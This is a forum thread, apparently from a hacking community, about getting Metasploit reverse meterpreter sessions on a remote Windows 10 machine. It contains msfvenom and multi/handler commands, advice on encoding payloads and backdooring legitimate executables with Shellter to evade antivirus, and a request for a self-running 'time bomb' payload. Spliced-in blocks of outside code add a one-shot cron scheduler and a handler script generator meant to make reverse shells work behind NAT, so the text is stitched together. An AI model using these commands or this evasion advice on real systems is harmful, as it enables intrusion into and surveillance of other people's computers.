
zalim786

Posts posted by zalim786

  1. No, you would have to run something to set up the scheduled task to run the script.

    Well, then that's something different; there are many other options to do something like that.

    I am interested in something that will do it all on its own, an exe that will execute on its own....

  2. On Linux

    Crontab

    #echo new cron into cron file
    echo "00 09 * * 1-5 echo hello" >> newcron
    #install new cron file (note: "crontab FILE" replaces the user's current crontab)
    crontab newcron
    

    On Windows scheduled task

    SchTasks /Create /SC DAILY /TN "The_name_of_your_task" /TR "notepad.exe" /ST 04:00
    

    There are a lot of other task schedulers, none of which I have used.

    Can an exe file execute on a given date automatically using cron?

    Let's say I put that exe file on a USB stick, plug that USB stick into another PC and copy the exe file there

    without first executing it by clicking; I just copy it and leave it there. Will it automatically execute?

  3. Also, is there a way to program a payload.exe in a way that it executes like a time bomb? I mean you set a date like, say,

    15.01.2016, and that's when it executes automatically?

    I really am interested in something like that....
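The cron and SchTasks snippets in the reply above set up a recurring job, while the question in posts 2 and 3 is about firing something once, on one calendar date. The script below is an added example (not code from the thread or from either poster) that builds such a cron line, guards it with a year check because cron has no year field, and appends it to the existing crontab instead of replacing it. The date, the time and the /usr/local/bin/backup.sh command are placeholder values.

```shell
#!/usr/bin/env bash
# Added example, not code from the thread. Builds a cron line that runs a
# command once, on a specific date, and installs it without clobbering the
# user's existing crontab. Date/time/command values are placeholders.

# cron_spec_for_date YYYY-MM-DD HH:MM
# Prints the five cron fields for that day and time, e.g. "0 9 15 1 *" for
# 2016-01-15 09:00. Returns 1 if the input is malformed or out of range.
cron_spec_for_date() {
  local date=$1 time=$2 y m d hh mm rest
  case $date in [0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]) ;; *) return 1 ;; esac
  case $time in [0-9][0-9]:[0-9][0-9]) ;; *) return 1 ;; esac
  y=${date%%-*}; rest=${date#*-}; m=${rest%%-*}; d=${rest#*-}
  hh=${time%:*}; mm=${time#*:}
  # 10# forces decimal so that "08" and "09" are not read as invalid octal.
  [ $((10#$m)) -ge 1 ] && [ $((10#$m)) -le 12 ] || return 1
  [ $((10#$d)) -ge 1 ] && [ $((10#$d)) -le 31 ] || return 1
  [ $((10#$hh)) -le 23 ] && [ $((10#$mm)) -le 59 ] || return 1
  printf '%d %d %d %d *\n' $((10#$mm)) $((10#$hh)) $((10#$d)) $((10#$m))
}

# cron_line_for_date YYYY-MM-DD HH:MM COMMAND
# cron has no year field, so the spec alone would fire again every year. The
# command is therefore wrapped in a year check. Inside a crontab a literal '%'
# must be written as '\%', otherwise cron treats it as a newline.
cron_line_for_date() {
  local date=$1 time=$2 cmd=$3 spec
  spec=$(cron_spec_for_date "$date" "$time") || return 1
  printf '%s [ "$(date +\\%%Y)" = %s ] && %s\n' "$spec" "${date%%-*}" "$cmd"
}

# install_cron_line LINE
# Appends to the current crontab. "crontab FILE" (as in the reply above)
# replaces the whole crontab and silently drops every existing job.
install_cron_line() {
  { crontab -l 2>/dev/null; printf '%s\n' "$1"; } | crontab -
}

# Stand-alone run: print the line that install_cron_line would add.
# (placeholder command; call install_cron_line "$line" to actually install it)
cron_line_for_date 2016-01-15 09:00 /usr/local/bin/backup.sh
```

The Windows one-shot equivalent of this is SchTasks with /SC ONCE together with /SD (start date, in the system's date format) and /ST (start time) instead of the /SC DAILY shown in the reply. Either way the entry has to be created by something that already runs on that machine; a file that is merely copied onto a disk does not execute by itself.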

  4. This is a stupid question, but do you have port 8080 open on the Windows 10 machine?

    netsh advfirewall firewall add rule name="Open Port 8080" dir=in action=allow protocol=TCP localport=8080
    

    If you want to test your payload to see if it works, test it without the firewall first.

    I had problems about a month ago trying to shell a Windows 10 box and here's some stuff I figured out. Windows 10 has some security features that are not available in previous versions of Windows. I'm not sure how it all works. Windows will notice that your payload is trying to hook into other system processes or DLLs on the Windows system. But if you inject your payload into the execution flow of a legitimate application it will run just fine and Windows isn't going to notice anything fishy.

    Here's something else you can do. Use a reverse_hop_http meterpreter:

    msfvenom -p windows/meterpreter/reverse_hop_http -e x86/shikata_ga_nai -i 3 --platform win HOPURL=http://192.168.0.184/hop.php EXTENSIONS=stdapi,priv -f raw -o /root/Desktop/donkeypunch.raw
    

    You can output it to whatever format you think will work. I noticed my payloads were getting flagged by Security Essentials and other anti-virus programs, so I decided I would backdoor a legitimate executable. I did that with a program called Shellter. Worked like a charm.

    Keep in mind that Shellter will not work with all binaries and also doesn't work every time. Sometimes you will have to try backdooring the exe several times before it's successful. Shellter does a lot of stuff that is at this point technically beyond me, but you can read about it on the website. https://www.shellterproject.com/

    The payload is built; make it available for download. Don't forget to move hop.php to your /var/www/html/ folder and start Apache.

    use exploit/multi/handler
    set HOPURL http://192.168.0.184/hop.php
    set payload windows/meterpreter/reverse_hop_http
    exploit -j
    

    Once the binary is run on the Windows 10 machine, you should see a session. If you get a session for like 20-30 seconds and then the session dies, it's because your payload was caught by Windows 10 security features.

    The great thing about this is once you build a payload like this it will work on Windows 7 or XP as well.

    Also I think there's a way to bind meterpreter to Edge or Internet Explorer with prepend migrate and masquerade as that application so it can hop the firewall that way. If there is a way to do that I would like to know it.

    Thanks a lot for the reply, I will try it out with my friend tomorrow.

    Well, yes, port 8080 was open when we were testing it, but the problem is not Windows 10 security anymore; we managed to get a working session from Windows 10 using

    meterpreter/reverse_https and the ReverseListenerBindAddress option. We managed the connection; the problem now is something so weird that I have never

    encountered it before.

    So the problem is:

    my friend is using

    a Hitron Technologies CVE-30360 router, and no matter what exploit or RAT you use, this router seems super intelligent compared to other routers.
    You can locally (on the LAN) hack into any Windows machine through this router using Metasploit, but over the INTERNET it seems ALMOST impossible.
    These are the things we have tried so far.
    My friend's Windows 10 laptop, which is 200 km away from me, is connected to a Hitron Technologies

    CVE-30360 router.

    So as long as it is connected to this router, you will get no sessions on Metasploit from it, NONE, it won't work. Even DarkComet RATs (which don't work on Windows 10 anyway) won't work on older Windows like XP, 7 or 8, even if all the PORTS are open and all the security is down; still you can't get anything from it through the internet.....

    But if you try Metasploit and DarkComet RATs LOCALLY, they work fine; that router will allow local traffic to pass. Locally you can exploit any Windows machine with Metasploit.

    So now we thought, let us disconnect our Windows 10 laptop from the Hitron Technologies CVE-30360 router and connect it to the internet through iPhone 6 LTE tethering....

    So we did that, and what do you know? You get a session on Metasploit, you can exploit the Windows 10 machine any way you want, you can play around with data, cmd, webcam, keylogger, anything, UAC controls, anything you want, and when you connect it back to the Hitron Technologies CVE-30360 everything stops. And trust me, all the ports are open; we have tried a Netcat listener, you can open backdoors, yet still...

    I mean, I could be missing something, but I really have never experienced anything like this before...

  5. Done, all ports are open and working, allowing traffic.

    Now I have realised something.

    I have just tried the same file on another friend's laptop (he is using Windows 10).

    It worked even though he is very far away.

    So I thought, okay, why wouldn't it work on my first friend? So I asked my first friend to disconnect his Windows 10 laptop from the router he is using and connect it to the internet

    through his iPhone (using LTE data). As he did that, it worked, and it worked perfectly; I was able to get a connection.

    Now, is it possible that ROUTERS don't allow it? Even though his router firewall was also down and he even opened a few ports for me, still it wasn't possible.

    He is using this modem:

    Hitron Technologies

    CVE-30360

    I asked him to do it locally using his LAN and as he tried it, it worked. I mean this problem is so absurd that it's funny.

    - he gets sessions from the Windows 10 laptop using his Kali 2.0 when they are both connected to the same network

    - when the Windows 10 laptop is connected to his iPhone LTE, I get sessions as well

    - when his Windows 10 laptop is connected to his router, I don't get any sessions anymore, yet he still gets them from his other Kali 2.0 system on the same network

    I mean, what in that router could be stopping it?

  6. Have you got port forwarding set up on your router so the port you specify in the payload is mapped back to your machine?

    Look back in the forums, debugging this has been discussed quite a few times.

    Yes, my Kali 2 (on VMware) has this IP

    192.168.0.5

    and on my router I have port 8080 forwarded, and I can also see 8080 open on the canyouseeme website....

    BTW I also tried DUC No-IP using reverse_tcp_dns and still no success.

    I have searched the forum again and again without much success.....

  7. Hello guys,

    I am posting here for the first time, but I have been following these forums for a while now.

    My friend and I are trying to create a payload to hack into Windows 10 and control it using Metasploit.

    Now, we have done similar testing before on Windows XP, 7 and 8.

    Now in BackTrack it all worked smoothly, mostly, and mostly we tested over the LAN, but now

    we want to test on Windows 10, which is 200 KM away from my place. It's my friend's system; he has turned the Windows firewall

    and antivirus off, Defender is also not running and all the security is down.

    There is a method of getting into Windows 10 using a Macro; we haven't tested that yet, but that will be the next logical step for us.

    So now to the problem.

    We are using Kali 2.0 (I am still using Windows 7 due to some technical reasons); on my Windows 7 I am running Kali 2.0 using VMware (BRIDGED NETWORK).

    So when I create a payload and send it to my friend on his Windows 10, it doesn't open any session for me; he tried the same file on his Windows 7 and still Metasploit opened no session for me.

    Here is what I am doing:

    using Veil-Evasion I use windows/meterpreter/reverse_tcp

    LHOST (my public IP)

    Once I tried my open port, which was 8080; when that didn't work I tried without giving any port in this first step.

    So after generating the file called test.exe

    I opened my msfconsole and did the following:

    -use exploit/multi/handler (duh)

    -set payload windows/meterpreter/reverse_tcp

    -set LHOST (my Internet Kali IP)

    -set LPORT 8080

    -exploit

    So now it's running and I gave the file to my friend; he opened it in Windows 10, nothing happened; he opened it in Windows 7, nothing happened; he opened it even in old XP and nothing happened...

    Now I thought, ok, let me try it on the LAN.

    So this time during the first step I gave LHOST (internet Kali IP) with LPORT 8080

    and created a file called testlocal.exe.

    When I opened it on Windows 10 locally it worked perfectly; I got the session.

    So my question is, why isn't it working over the internet? I mean we have tried the app called DarkComet and it works on his Windows XP, 7 and 8 but not on Windows 10 (for obvious reasons),

    but this payload isn't working on any Windows at all over the internet. Am I missing something? Am I doing something wrong?

    I haven't tried the Macro method yet, but once I have success here I will go for the Macro method.

    Any ideas, guys?

    Thanks in advance,

    and forgive my English :)
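Posts 4, 6 and 7 above come down to one symptom: the payload connects back fine on the LAN but never over the internet, and what finally worked (post 4) was a handler configured with ReverseListenerBindAddress. The script below is an added example, not code from the thread or from either poster. It generates that kind of handler resource script for a Kali VM sitting behind NAT and adds a reachability check to run from outside the network. 203.0.113.10 (public IP), 192.168.0.5 (the VM's bridged address from post 6) and port 8080 are placeholders, handler.rc is an assumed output filename, and the reachability check assumes bash plus the coreutils timeout command.

```shell
#!/usr/bin/env bash
# Added example, not code from the thread. Generates a multi/handler resource
# script for a Kali VM behind NAT and provides a reachability check to run
# from outside the network. All addresses and ports are placeholders.

# valid_ipv4 ADDR -> 0 if ADDR is a dotted quad with every octet in 0..255
valid_ipv4() {
  local IFS=. octet
  set -- $1
  [ $# -eq 4 ] || return 1
  for octet; do
    case $octet in ''|*[!0-9]*) return 1 ;; esac
    [ "$octet" -le 255 ] || return 1
  done
}

# valid_port N -> 0 if N is an integer in 1..65535
valid_port() {
  case $1 in ''|*[!0-9]*) return 1 ;; esac
  [ "$1" -ge 1 ] || return 1
  [ "$1" -le 65535 ] || return 1
}

# handler_rc PUBLIC_IP BIND_IP PORT
# The payload is generated with LHOST=PUBLIC_IP (the address the router
# forwards from). Inside the VM that address does not exist, so the listener
# must bind to the VM's own private address; that is what
# ReverseListenerBindAddress is for. LHOST stays equal to the payload's LHOST.
handler_rc() {
  local public_ip=$1 bind_ip=$2 port=$3
  valid_ipv4 "$public_ip" || { echo "bad public ip: $public_ip" >&2; return 1; }
  valid_ipv4 "$bind_ip"   || { echo "bad bind ip: $bind_ip" >&2; return 1; }
  valid_port "$port"      || { echo "bad port: $port" >&2; return 1; }
  printf '%s\n' \
    'use exploit/multi/handler' \
    'set PAYLOAD windows/meterpreter/reverse_tcp' \
    "set LHOST $public_ip" \
    "set ReverseListenerBindAddress $bind_ip" \
    "set LPORT $port" \
    'set ExitOnSession false' \
    'exploit -j'
}

# tcp_reachable HOST PORT [TIMEOUT_SECONDS]
# Opens a TCP connection with bash's /dev/tcp (no netcat needed). Run this
# from a host OUTSIDE your network against your public IP while the handler
# is listening: if it fails, the port forward or the VM's bridged networking
# is the problem, not the payload.
tcp_reachable() {
  timeout "${3:-3}" bash -c "exec 3<>/dev/tcp/$1/$2" 2>/dev/null
}

# Stand-alone run: print the resource script. To use it:
#   handler_rc 203.0.113.10 192.168.0.5 8080 > handler.rc
#   msfconsole -r handler.rc
handler_rc 203.0.113.10 192.168.0.5 8080
```

Two practical notes. The netsh rule quoted in post 4 opens an inbound port on the target, but a reverse payload makes an outbound connection, so the target needs no inbound rule at all; the inbound port that has to be open and forwarded is the one on the attacker's router, which is exactly what tcp_reachable checks. And because the generated payload carries the public IP, a LAN test with that same exe only proves the payload runs, not that the forward works; the external check is the one that separates the two failures in post 7.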
